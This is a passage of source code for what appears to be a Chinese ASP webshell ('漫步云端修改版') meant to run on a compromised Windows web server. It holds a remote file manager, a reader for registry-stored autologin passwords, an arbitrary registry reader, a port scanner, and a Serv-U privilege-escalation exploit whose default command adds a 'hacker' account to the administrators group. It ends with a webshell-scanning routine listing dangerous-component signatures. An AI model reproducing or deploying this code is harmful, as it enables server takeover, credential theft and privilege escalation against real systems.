set TFL=new FIF
FStart = InStr(FEnd,TIn,"filename=""",1)+10
FEnd = InStr(FStart,TIn,"""",1)
FStart = InStr(FEnd,TIn,"Content-Type: ",1)+14
FEnd = InStr(FStart,TIn,vbCr)
TFL.FileStart =DIEnd
TFL.FileSize = DStart -DIEnd -3
if not D2.Exists(UpName) then
D2.add UpName,TFL
end if
else
T2.Type =1 : T2.Mode =3 : T2.Open
T1.Position = DIEnd : T1.CopyTo T2,DStart-DIEnd-3
T2.Position = 0 : T2.Type = 2
T2.Charset ="gb2312"
SFV = T2.ReadText
T2.Close
if D1.Exists(UpName) then
D1(UpName)=D1(UpName)&", "&SFV
else
D1.Add UpName,SFV
end if
end if
DStart=DStart+TLen+1
wend
TDa=""
set T2 =nothing
End Sub
Private Sub Class_Terminate
if Request.TotalBytes>0 then
D1.RemoveAll:D2.RemoveAll
set D1=nothing:set D2=nothing
T1.Close:set T1 =nothing
end if
End Sub
End Class
Class FIF
dim FileSize,FileStart
Private Sub Class_Initialize
FileSize = 0
FileStart= 0
End Sub
Public function SaveAs(F)
dim T3
SaveAs=true
if trim(F)="" or FileStart=0 then exit function
set T3=CreateObject(ObT(6,0))
T3.Mode=3 : T3.Type=1 : T3.Open
T1.position=FileStart
T1.copyto T3,FileSize
T3.SaveToFile F,2
T3.Close
set T3=nothing
SaveAs=false
end function
End Class
Class LBF
Dim CF
Private Sub Class_Initialize
SET CF=CreateObject(ObT(0,0))
End Sub
Private Sub Class_Terminate
Set CF=Nothing
End Sub
Function ShowDriver()
For Each D in CF.Drives
RRS" <a href='javascript:ShowFolder
("""&D.DriveLetter&":\\"")'>本地磁盘 ("&D.DriveLetter&":)</a><br>"
Next
End Function
Function Show1File(Path)
Set FOLD=CF.GetFolder(Path)
i=0
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'><tr>"
For Each F in FOLD.subfolders
SI=SI&"<td height=10>"
SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)
&""")' title=""打开""><font face='wingdings'
size='6'>0</font>"&F.Name&"</a>"
SI=SI&" _<a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""CopyFolder"")' onclick='return yesok()'
class='am' title='复制'>复制</a>"
SI=SI&" <a href='javascript:FullForm("""&Replace
(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")' onclick='return yesok
()' class='am' title='删除'>删除</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""MoveFolder"")' onclick='return yesok()'
class='am' title='移动'>移动</a>"
SI=SI&" <a href='javascript:FullForm("""&RePath
(Path&"\"&F.Name)&""",""DownFile"")' onclick='return yesok()'
class='am' title='下载'>下载</a></td>"
i=i+1
If i mod 3 = 0 then SI=SI&"</tr><tr>"
Next
SI=SI&"</tr><tr><td height=2></td></tr></table>"
RRS SI &"<hr noshade color=""#CCCCCC"" size=1 color=""#"" />" :
SI=""
For Each L in Fold.files
SI="<table width='100%' border='0' cellspacing='0'
cellpadding='0'>"
SI=SI&"<tr style='boungroup-color:#'>"
SI=SI&"<td height='30'><a href='javascript:FullForm("""&RePath
(Path&"\"&L.Name)&""",""DownFile"");' title='下载'><font
face='wingdings' size='4'>2</font>"&L.Name&"</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""EditFile"")' class='am' title='编辑'>编辑</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""CopyFile"")' class='am' title='复制'>复制</a></td>"
SI=SI&"<td width='40' align=""center""><a
href='javascript:FullForm("""&RePath(Path&"\"&L.Name)
&""",""MoveFile"")' class='am' title='移动'>移动</a></td>"
SI=SI&"<td width='50' align=""center"">"&clng(L.size/1024)&"K</td>"
SI=SI&"<td width='200' align=""center"">"&L.Type&"</td>"
SI=SI&"<td width='160'>"&L.DateLastModified&"</td>"
SI=SI&"</tr></table>"
RRS SI:SI=""
Next
Set FOLD=Nothing
End function
Function DelFile(Path)
If CF.FileExists(Path) Then
CF.DeleteFile Path
SI="<center><br><br><br>文件 "&Path&" 删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function EditFile(Path)
If Request("Action2")="Post" Then
Set T=CF.CreateTextFile(Path)
T.WriteLine Request.form("content")
T.close
Set T=nothing
SI="<center><br><br><br>文件保存成功!</center>"
SI=SI&BackUrl
RRS SI
Response.End
End If
If Path<>"" Then
Set T=CF.opentextfile(Path, 1, False)
Txt=HTMLEncode(T.readall)
T.close
Set T=Nothing
Else
Path=Session("FolderPath")&"\newfile.asp":Txt="新建文件"
End If
SI=SI&"<Form action='"&URL&"?Action2=Post' method='post'
name='EditForm'>"
SI=SI&"<input name='Action' value='EditFile' Type='hidden'>"
SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>"
SI=SI&"<textarea name='Content'
style='width:100%;height:450'>"&Txt&"</textarea><br>"
SI=SI&"<hr><input name='goback' type='button' value='返回'
onclick='history.back();'> <input name='reset'
type='reset' value='重置'> <input name='submit'
type='submit' value='保存'></form>"
RRS SI
End Function
Function CopyFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.CopyFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function MoveFile(Path)
Path = Split(Path,"||||")
If CF.FileExists(Path(0)) and Path(1)<>"" Then
CF.MoveFile Path(0),Path(1)
SI="<center><br><br><br>文件"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function DelFolder(Path)
If CF.FolderExists(Path) Then
CF.DeleteFolder Path
SI="<center><br><br><br>目录"&Path&"删除成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function CopyFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.CopyFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"复制成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function MoveFolder(Path)
Path = Split(Path,"||||")
If CF.FolderExists(Path(0)) and Path(1)<>"" Then
CF.MoveFolder Path(0),Path(1)
SI="<center><br><br><br>目录"&Path(0)&"移动成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
Function NewFolder(Path)
If Not CF.FolderExists(Path) and Path<>"" Then
CF.CreateFolder Path
SI="<center><br><br><br>目录"&Path&"新建成功!</center>"
SI=SI&BackUrl
RRS SI
End If
End Function
End Class
sub getTerminalInfo()
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
Dim terminalPortPath, terminalPortKey, termPort
Dim autoLoginPath, autoLoginUserKey, autoLoginPassKey
Dim isAutoLoginEnable, autoLoginEnableKey, autoLoginUsername,
autoLoginPassword
terminalPortPath = "HKLM\SYSTEM\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-Tcp\"
terminalPortKey = "PortNumber"
termPort = wsX.RegRead(terminalPortPath & terminalPortKey)
RRS "终端服务端口及自动登录<hr/><ol>"
If termPort = "" Or Err.Number <> 0 Then
RRS"无法得到终端服务端口, 请检查权限是否已经受到限制.<br/>"
Else
RRS "当前终端服务端口: " & termPort & "<br/>"
End If
autoLoginPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon\"
autoLoginEnableKey = "AutoAdminLogon"
autoLoginUserKey = "DefaultUserName"
autoLoginPassKey = "DefaultPassword"
isAutoLoginEnable = wsX.RegRead(autoLoginPath & autoLoginEnableKey)
If isAutoLoginEnable = 0 Then
RRS "系统自动登录功能未开启<br/>"
Else
autoLoginUsername = wsX.RegRead(autoLoginPath & autoLoginUserKey)
RRS "自动登录的系统帐户: " & autoLoginUsername & "<br>"
autoLoginPassword = wsX.RegRead(autoLoginPath & autoLoginPassKey)
If Err Then
Err.Clear
RRS "False"
End If
RRS "自动登录的帐户密码: " & autoLoginPassword & "<br>"
End If
RRS "</ol>"
End Sub
sub ReadREG()
RRS "注册表键值读取:<hr/>"
RRS "<form method=post>"
RRS "<input type=hidden value=readReg name=theAct>"
RRS "<input name=thePath
value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\
ComputerName' size=80>"
RRS " <input type=submit value=' 读取 '>"
RRS "<span id=regeditInfo style='display:none;'><hr/>"
RRS "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\Dont-
DisplayLastUserName,REG_SZ,1 {不显示上次登录用户}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous,REG_DWORD,
0 {0=缺省,1=匿名用户无法列举本机用户列表,2=匿名用户无法连接本机IPC$共享
}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\AutoSha
reServer,REG_DWORD,0 {禁止默认共享}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters\EnableS
haredNetDrives,REG_SZ,0 {关闭网络共享}<br/>"
RRS
"HKLM\SYSTEM\currentControlSet\Services\Tcpip\Parameters\EnableSecurity
Filters,REG_DWORD,1 {启用TCP/IP筛选(所有试配器)}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\IPEnableRouter,REG_DWORD,1 {允许IP路由}
<br/>"
RRS "-------以下似乎要看绑定的网卡,不知道是否准确---------<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\DefaultGateway,REG_MUTI_SZ {默认网
关}<br/>"
RRS
"HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{8A
465128-8E99-4B0C-AFF3-1348DC55EB2E}\NameServer {首DNS}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\TCPAllowedPorts {允许的TCP/IP端口}<br/>"
RRS "HKLM\SYSTEM\ControlSet001
\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-
1348DC55EB2E}\UDPAllowedPorts {允许的UDP端口}<br/>"
RRS "-----------OVER--------------------<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Enum\Count {共几块活动网
卡}<br/>"
RRS "HKLM\SYSTEM\ControlSet001\Services\Tcpip\Linkage\Bind {当前网卡的
序列(把上面的替换)}<br/>"
RRS "</span>"
RRS "</form><hr/>"
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=wsX.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
RRS "<li>" & theArray(i)
Next
Else
RRS "<li>" & theArray
End If
end if
end sub
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,25,80,110,135,139,445,1433,3389,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
RRS"<p>端口扫描器</p>"
RRS"<form name='form1' method='post' action=''
onSubmit='form1.submit.disabled=true;'>"
RRS"<p>Scan IP: "
RRS" <input name='ip' type='text' class='TextBox' id='ip'
value='"&Request.ServerVariables("LOCAL_ADDR")&"' size='60'>"
RRS"<br>Port List:"
RRS"<input name='port' type='text' class='TextBox' size='60'
value='"&PortList&"'>"
RRS"<br><br>"
RRS"<input name='submit' type='submit' class='buttom' value=' 扫描 '>"
RRS"<input name='scan' type='hidden' id='scan' value='111'>"
RRS"</p></form>"
If request.Form("scan") <> "" Then
timer1 = timer
RRS("<b>扫描报告:</b><br><hr>")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Else
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip
(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
RRS(startN & " or " & endN & " is not number<br>")
End If
Else
RRS(tmp(i) & " is not number<br>")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
RRS"<hr>Process in "&thetime&" s"
END IF
end sub
Sub Scan(targetip, portNum)
On Error Resume Next
set conn = Server.CreateObject("ADODB.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","&
portNum &";User ID=lake2;Password=;"
conn.ConnectionTimeout = 1
conn.open connstr
If Err Then
If Err.number = -2147217843 or Err.number = -2147467259
Then
If InStr(Err.description, "(Connect()).") > 0
Then
RRS(targetip & ":" & portNum &
".........关闭<br>")
Else
RRS(targetip & ":" & portNum &
".........<font color=red>开放</font><br>")
End If
End If
End If
End Sub
Select Case Action
Case "MainMenu":MainMenu()
Case "getTerminalInfo":getTerminalInfo()
case "ScanPort":ScanPort()
Case "Servu"
SUaction=request("SUaction")
if not isnumeric(SUaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "
PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" &
vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-
PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" &
vbCrLf & _
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-
Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-
AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf &
"-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-
SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" &
vbCrLf & _
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-
QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" &
vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case SUaction
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='2'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
RRS"setTimeout('document.all.goldsun.submit();',4000);"
RRS"</script>"
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd &
vbCrLf & quit
set session("b")=b
RRS"<form method='post' name='goldsun'>"
RRS"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
RRS"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
RRS"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
RRS"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
RRS"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
RRS"<input name='SUaction' type='hidden' id='SUaction'
value='3'></form>"
RRS"<script language='javascript'>"
RRS"document.write('<center>正在提升权限,请等待…………<center>');"
RRS"setTimeout(""document.all.goldsun.submit();"",4000);"
RRS"</script>"
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
RRS"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
RRS"<input type=button value=' 返回继续 ' onClick=""location.href='?
Action=Servu';"">"
RRS"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
RRS"<center><form method='post' name='goldsun'>"
RRS"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
RRS"<tr align='center' valign='middle'>"
RRS"<td colspan='2'>Serv-U 提升权限 漫步云端修改版</td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td width='100'>用户名:</td>"
RRS"<td width='379'><input name='u' type='text' id='u'
value='LocalAdministrator'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>口 令:</td>"
RRS"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@P'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>端 口:</td>"
RRS"<td><input name='port' type='text' id='port' value='43958'></td>"
RRS"</tr>"
RRS"<tr align='center' valign='middle'>"
RRS"<td>系统路径:</td>"
RRS" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td>命 令:</td>"
RRS" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
RRS" </tr>"
RRS" <tr align='center' valign='middle'>"
RRS" <td colspan='2'><input type='submit' name='Submit' value='提
交'> "
RRS"<input type='reset' name='Submit2' value='重置'>"
RRS"<input name='SUaction' type='hidden' id='action' value='1'></td>"
RRS"</tr></table></form></center>"
end select
function Gpath()
on error resume next
err.clear
set f=Server.CreateObject("Scripting.FileSystemObject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.GetSpecialFolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
Case "kmuma"
dim Report
if request.QueryString("act")<>"scan" then
RRS ("<b>网站根目录</b>- "&Server.MapPath("/")&"<br>")
RRS ("<b>本程序目录</b>- "&Server.MapPath("."))
RRS "<form action=""?Action=kmuma&act=scan""
method=""post"" name=""form1"">"
RRS "<p><b>填入你要检查的路径:</b>"
RRS "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
RRS "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onClick=""document.getElementById
('showFile1').style.display='none'"" checked>查ASP 马"
RRS "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onClick=""document.getElementById
('showFile1').style.display=''"">搜索符合条件之文件<br>"
RRS "<br /><div id=""showFile1""
style=""display:none"">"
RRS " 查找内容:<input
name=""Search_Content"" type=""text"" id=""Search_Content""
style=""border:1px solid #999"" size=""20"">"
RRS " 要查找的字符串,不填就只进行日期检查<br />"
RRS " 修改日期:<input name=""Search_Date""
type=""text"" style=""border:1px solid #999"" value="""&Left(Now
(),InStr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onClick=""javascript:form1.Search_Date.value='ALL'"">ALL</a><br />"
RRS " 文件类型:<input
name=""Search_FileExt"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
RRS "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
RRS "</form>"
else
if request.Form("path")="" then
RRS("路径不能为空")
response.End()
end if
if request.Form("path")="\" then
TmpPath = Server.MapPath("\")
elseif request.Form("path")="." then
TmpPath = Server.MapPath(".")
else
TmpPath = request.Form("path")
end if
timer1 = timer
Sun = 0
SumFiles = 0
SumFolders = 1
If request.Form("radiobutton") = "sws" Then
DimFileExt = "asp,cer,asa,cdx"
Call ShowAllFile(TmpPath)
Else
If request.Form("path") = "" or request.Form
("Search_Date") = "" or request.Form("Search_FileExt") = "" Then
RRS("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.End()
End If
DimFileExt = request.Form("Search_fileExt")
Call ShowAllFile2(TmpPath)
End If
RRS "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
RRS "<tr><th>Scan WebShell -- 漫步云端修改版</tr>"
RRS "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
RRS "<div id=""updateInfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
RRS "扫描完毕!一共检查文件夹<font
color=""#FF0000"">"&SumFolders&"</font>个,文件<font
color=""#FF0000"">"&SumFiles&"</font>个,发现可疑点<font
color=""#FF0000"">"&Sun&"</font>个"
RRS "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
If request.Form("radiobutton") = "sws" Then
RRS "<td width=""20%"">文件相对路径</td>"
RRS "<td width=""20%"">特征码</td>"
RRS "<td width=""40%"">描述</td>"
RRS "<td width=""20%"">创建/修改时间</td>"
else
RRS "<td width=""50%"">文件相对路径</td>"
RRS "<td width=""25%"">文件创建时间</td>"
RRS "<td width=""25%"">修改时间</td>"
end if
RRS "</tr>"
RRS Report
RRS "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
RRS "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
Sub ShowAllFile(Path)
Set F1SO = CreateObject("Scripting.FileSystemObject")
if not F1SO.FolderExists(path) then exit sub
Set f = F1SO.GetFolder(Path)
Set fc2 = f.files
For Each myfile in fc2
If CheckExt(F1SO.GetExtensionName
(path&"\"&myfile.name)) Then
Call ScanFile(Path&Temp&"\"&myfile.name, "")
SumFiles = SumFiles + 1
End If
Next
Set fc = f.SubFolders
For Each f1 in fc
ShowAllFile path&"\"&f1.name
SumFolders = SumFolders + 1
Next
Set F1SO = Nothing
End Sub
Sub ScanFile(FilePath, InFile)
Server.ScriptTimeout=999999999
If InFile <> "" Then
Infiles = "<font color=red>该文件被<a
href=""http://"&Request.Servervariables("server_name")&"/"&tURLEncode
(InFile)&""" target=_blank>"& InFile & "</a>文件包含执行</font>"
End If
Set FSO1s = CreateObject("Scripting.FileSystemObject")
on error resume next
set ofile = FSO1s.OpenTextFile(FilePath)
filetxt = Lcase(ofile.readall())
If err Then Exit Sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
temp = "<a href=""http://"&Request.Servervariables
("server_name")&"/"&tURLEncode(replace(replace(FilePath,server.MapPath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(FilePath,server.MapPath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""EditFile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")&""",""DelFile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""CopyFile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:FullForm("""&replace(replace
(FilePath,server.MapPath("\")&"\","",1,1,1),"\","\\")
&""",""MoveFile"")' class='am' title='移动'>移动</a>"
If instr( filetxt, Lcase
("WScr"&DoMyBest&"ipt.Shell") ) or Instr( filetxt, Lcase
("clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>WScr"&DoMyBest&"ipt.Shell 或者
clsid:72C24DD5-D70A"&DoMyBest&"-438B-8A42-98424B88AFB8</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End if
If instr( filetxt, Lcase
("She"&DoMyBest&"ll.Application") ) or Instr( filetxt, Lcase
("clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000") ) then
Report =
Report&"<tr><td>"&temp&"</td><td>She"&DoMyBest&"ll.Application 或者
clsid:13709620-C27"&DoMyBest&"9-11CE-A49E-444553540000</td><td><font
color=red>危险组件,一般被ASP木马利用
</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "\bLANGUAGE\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).Encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\bEv"&"al\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Ev"&"al</td><td>e"&"val()函数可以执行
任意ASP代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "[^.]\bExe"&"cute\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>Exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意ASP代码
</font><br>"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.(Open|Create)TextFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.CreateTextFile|.OpenTextFile</td><td>
使用了FSO的CreateTextFile|OpenTextFile读写文
件"&infiles&"</td><td>"&GetDateCreate(filepath)&"<br>"&GetDateModify
(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.SaveToFile\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.SaveToFile</td><td>使用了Stream的
SaveToFile函数写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
regEx.Pattern = "\.Save\b"
If regEx.Test(filetxt) Then
Report =
Report&"<tr><td>"&temp&"</td><td>.Save</td><td>使用了XMLHTTP的Save函数
写文件"&infiles&"</td><td>"&GetDateCreate(filepath)
&"<br>"&GetDateModify(filepath)&"</td></tr>"
Sun = Sun + 1
temp="-=| 同上 |=-"
End If
Set regEx = Nothing
Set regEx = New RegExp
regEx.IgnoreCase = True
regEx.Global = True
regEx.Pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
Set Matches = regEx.Execute(filetxt)
For Each Match in Matches
tFile = Replace(Mid(Match.Value, Instr
(Match.Value, """") + 1, Len(Match.Value) - Instr(Match.Value, """") -
1),"/","\")
